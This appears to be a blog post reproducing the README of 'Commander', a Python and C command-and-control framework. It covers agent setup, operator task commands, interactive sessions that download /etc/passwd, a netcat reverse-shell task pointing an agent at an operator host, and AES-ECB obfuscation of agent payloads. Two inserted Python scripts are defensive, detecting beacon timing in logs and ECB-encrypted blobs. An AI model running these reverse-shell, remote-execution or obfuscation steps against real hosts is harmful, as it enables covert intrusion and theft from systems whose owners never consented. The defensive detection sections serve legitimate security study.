Saturday, October 21, 2023

A Command And Control (C2) Server




Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly

Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload file functionality
  • C
    • The C agent supports only the basic functionality for now, the handling of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run, plus the following dependencies

Linux for the admin.py and c2_server.py. (Untested for Windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase, exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

Continue by running the server

And last the agent. For the python agent you can just run it, but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in the Agents' source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or to all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval at which an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server on this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/results of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!

Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select which session to attach to.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists on your host the files in the selected directory
download 'file'
Downloads the 'file' locally into the current directory
upload 'file'
Uploads a file into the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it's not, at least that's what I believe 😛

The idea behind this functionality is that the c2 server can request an agent to re-register in case it doesn't recognize it. So, since we want to clear the db of unused old entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case the environment experiences a major failure, like a corrupted database or some other critical failure, the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case we lose the database we will not have any information about the uuids that we are receiving, thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and, since we don't recognize them, we will ask them to register again so we can insert them into our database and control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To set up your environment start the admin.py first, then the c2_server.py, and run the agent. Afterwards you can check the available agents.

# show all available agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/previous results of executed tasks for a specific agent do it like this:

# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval at which the agents check for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30
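The agents poll the server for tasks at a fixed interval (30 seconds in the line above), and that regularity is exactly what a defender can look for in the server's access log or in proxy logs. The following Python script is an added example, not part of Commander or its README: it parses constructed access-log lines in the common log format (the same format gunicorn's `--access-logfile` writes), groups requests by client, and flags clients whose inter-request gaps have almost no jitter. The hosts, paths and timestamps in `SAMPLE_LOG` are made up and are not Commander's real endpoints.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample access-log lines (common log format). The client
# addresses, request paths and timestamps are invented for this demo.
SAMPLE_LOG = """\
10.0.0.7 - - [21/Oct/2023:10:00:00 +0000] "GET /tasks/aaa HTTP/1.1" 200 31 "-" "python-requests/2.31"
10.0.0.7 - - [21/Oct/2023:10:00:30 +0000] "GET /tasks/aaa HTTP/1.1" 200 31 "-" "python-requests/2.31"
10.0.0.7 - - [21/Oct/2023:10:01:00 +0000] "GET /tasks/aaa HTTP/1.1" 200 31 "-" "python-requests/2.31"
10.0.0.7 - - [21/Oct/2023:10:01:30 +0000] "GET /tasks/aaa HTTP/1.1" 200 31 "-" "python-requests/2.31"
10.0.0.7 - - [21/Oct/2023:10:02:00 +0000] "GET /tasks/aaa HTTP/1.1" 200 31 "-" "python-requests/2.31"
10.0.0.9 - - [21/Oct/2023:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Oct/2023:10:00:41 +0000] "GET /about.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Oct/2023:10:03:17 +0000] "GET /contact.html HTTP/1.1" 200 610 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Oct/2023:10:03:19 +0000] "GET /style.css HTTP/1.1" 200 1020 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Oct/2023:10:09:50 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# client ip, ident, user, [timestamp], "request line"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')


def parse_log(text):
    """Return {client_ip: [datetime, ...]} with request times in file order."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        hits[m.group("ip")].append(ts)
    return hits


def beacon_score(timestamps):
    """Return (mean_gap_seconds, jitter) for one client, or None if there
    are too few requests to judge. jitter is the coefficient of variation
    of the inter-request gaps: near 0 means a fixed polling interval."""
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    if mean == 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(text, max_jitter=0.1):
    """Return {ip: mean_interval_seconds} for clients whose request timing
    is regular enough to look like automated polling rather than browsing."""
    suspects = {}
    for ip, stamps in parse_log(text).items():
        score = beacon_score(stamps)
        if score is not None and score[1] <= max_jitter:
            suspects[ip] = score[0]
    return suspects


if __name__ == "__main__":
    for ip, interval in find_beacons(SAMPLE_LOG).items():
        print(f"{ip}: polls every {interval:.0f}s with near-constant timing")
```

Real agents often add random sleep jitter, so in practice the threshold is tuned per environment and combined with other signals (constant response size, unusual User-Agent, requests outside working hours); the timing regularity alone is a starting point, not a verdict.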

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your preferred agent
task add your_preferred_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, let's select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) into the directory where the agent is
upload test.txt

# return to the main cli
return

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session, like with netcat or metasploit, do the following.

# show all available agents
show agent all

# first open a netcat listener on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that, even if you get disconnected, will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as normal
python3 obs_agent.py
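Because the obfuscator uses AES in ECB mode, identical 16-byte plaintext blocks (long runs of indentation, repeated boilerplate) produce identical ciphertext blocks, so the base64 blob still reveals the shape of the source even though its bytes look random. The following Python script is an added example, not part of Commander or its obfuscator.py, showing how a defender can fingerprint such a payload by counting repeated blocks after base64 decoding. To stay dependency-free it does not use real AES: `_toy_block_map` is a stand-in keyed block transform (SHA-256 truncated to 16 bytes, one-way, not a cipher) that reproduces the one ECB property the detector relies on, namely that each block is transformed independently of its neighbours, and a CBC-style chained variant is included for contrast. `KEY`, `IV` and `SAMPLE_SOURCE` are constructed demo values.

```python
import base64
import hashlib
from collections import Counter

BLOCK = 16  # AES block size in bytes; the README's key is 16 chars as well

# Constructed demo values (not the project's key or payload)
KEY = b"0123456789abcdef"
IV = b"\x00" * BLOCK
# Python-like source with a long run of indentation spaces, the kind of
# repeated 16-byte blocks an obfuscated agent's source would contain
SAMPLE_SOURCE = b"import os\n" + b" " * 640 + b"x = 1\n"


def _toy_block_map(block, key):
    """Stand-in for one block encryption: deterministic, keyed, stateless.
    NOT AES and not invertible; it only mimics the ECB property that equal
    input blocks give equal output blocks under the same key."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def _pad(data):
    """PKCS#7 padding up to a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def ecb_encrypt_stand_in(plaintext, key):
    """ECB style: every block is mapped independently of its neighbours."""
    padded = _pad(plaintext)
    return b"".join(_toy_block_map(padded[i:i + BLOCK], key)
                    for i in range(0, len(padded), BLOCK))


def cbc_encrypt_stand_in(plaintext, key, iv):
    """CBC style: each block is XORed with the previous output before mapping,
    so equal plaintext blocks no longer give equal ciphertext blocks."""
    padded = _pad(plaintext)
    prev, out = iv, []
    for i in range(0, len(padded), BLOCK):
        mixed = bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev))
        prev = _toy_block_map(mixed, key)
        out.append(prev)
    return b"".join(out)


def repeated_block_ratio(blob_b64):
    """Base64-decode a blob and return the fraction of 16-byte blocks that
    duplicate an earlier block. For random-looking ciphertext this is ~0."""
    raw = base64.b64decode(blob_b64)
    usable = len(raw) - len(raw) % BLOCK
    blocks = [raw[i:i + BLOCK] for i in range(0, usable, BLOCK)]
    if not blocks:
        return 0.0
    duplicates = sum(c - 1 for c in Counter(blocks).values())
    return duplicates / len(blocks)


def looks_like_ecb(blob_b64, threshold=0.05):
    """Flag a blob whose repeated-block ratio is far above chance."""
    return repeated_block_ratio(blob_b64) >= threshold


ECB_BLOB = base64.b64encode(ecb_encrypt_stand_in(SAMPLE_SOURCE, KEY)).decode()
CBC_BLOB = base64.b64encode(cbc_encrypt_stand_in(SAMPLE_SOURCE, KEY, IV)).decode()

if __name__ == "__main__":
    for name, blob in (("ECB-style", ECB_BLOB), ("CBC-style", CBC_BLOB)):
        ratio = repeated_block_ratio(blob)
        print(f"{name}: {ratio:.2%} repeated blocks, ECB suspected: {looks_like_ecb(blob)}")
```

The detector never needs the key: it only needs the base64 text, which is why the same check works on a dropped obs_agent.py, on a mail attachment, or on a blob carved out of network traffic. It also explains why the README's "obfuscation" is best read as hiding strings from casual inspection, not as a confidentiality guarantee.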

Tips & Tricks

  1. The built-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
  2. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  3. Create new certs in each engagement

  4. Backup your c2.db, it's easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


